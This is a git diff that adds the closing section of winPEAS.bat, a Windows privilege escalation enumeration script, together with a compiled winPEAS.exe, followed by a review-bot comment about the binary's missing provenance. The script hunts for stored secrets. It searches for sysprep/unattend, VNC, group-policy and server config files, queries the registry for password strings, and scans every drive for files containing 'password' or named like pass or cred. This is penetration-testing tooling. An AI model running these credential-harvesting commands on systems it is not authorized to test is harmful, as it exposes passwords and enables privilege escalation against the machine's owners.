FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"
+cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..)
+ECHO.
+CALL :T_Progress 2
+
+:ExtendedDriveScan
+if "%long%" == "true" (
+ CALL :ColorLine " %E%33m[+]%E%97m REGISTRY WITH STRING pass OR pwd"
+ reg query HKLM /f passw /t REG_SZ /s
+ reg query HKCU /f passw /t REG_SZ /s
+ reg query HKLM /f pwd /t REG_SZ /s
+ reg query HKCU /f pwd /t REG_SZ /s
+ ECHO.
+ ECHO. [i] Iterating through the drives
+ ECHO.
+ for /f %%x in ('wmic logicaldisk get name^| more') do (
+ set tdrive=%%x
+ if "!tdrive:~1,2!" == ":" (
+ %%x
+ CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config"
+ findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul
+ ECHO.
+ CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\"
+ dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\"
+ ECHO.
+ )
+ )
+ CALL :T_Progress 2
+) ELSE (
+ CALL :T_Progress 2
+)
+TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Idle
+ECHO.---
+ECHO.Scan complete.
+PAUSE >NUL
+EXIT /B
+
+:::-Subroutines
+
+:SetOnce
+REM :: ANSI escape character is set once below - for ColorLine Subroutine
+SET "E=0x1B["
+SET "PercentageTrack=0"
+EXIT /B
+
+:T_Progress
+SET "Percentage=%~1"
+SET /A "PercentageTrack=PercentageTrack+Percentage"
+TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Scanning... !PercentageTrack!%%
+EXIT /B
+
+:ColorLine
+SET "CurrentLine=%~1"
+FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A
+EXIT /B
diff --git a/win/winPEAS.exe b/win/winPEAS.exe
new file mode 100644
index 0000000..4b19fe0
Binary files /dev/null and b/win/winPEAS.exe differ
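Review bot: The new win/winPEAS.exe is an opaque compiled binary added with no recorded provenance in this diff — no upstream version or commit it was built from, no build instructions, and no checksum — so neither reviewers nor anyone cloning the repository can verify what the artifact actually contains. A committed executable is a supply-chain risk precisely because a later replacement with a tampered build would look like any other binary change. Record the source revision and a SHA-256 for the file next to it (for example a `win/README` line such as `winPEAS.exe: built from <UPSTREAM-TAG-PLACEHOLDER>, sha256 <HASH-PLACEHOLDER>`), or build it reproducibly in CI and publish it as a release asset instead of committing it.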
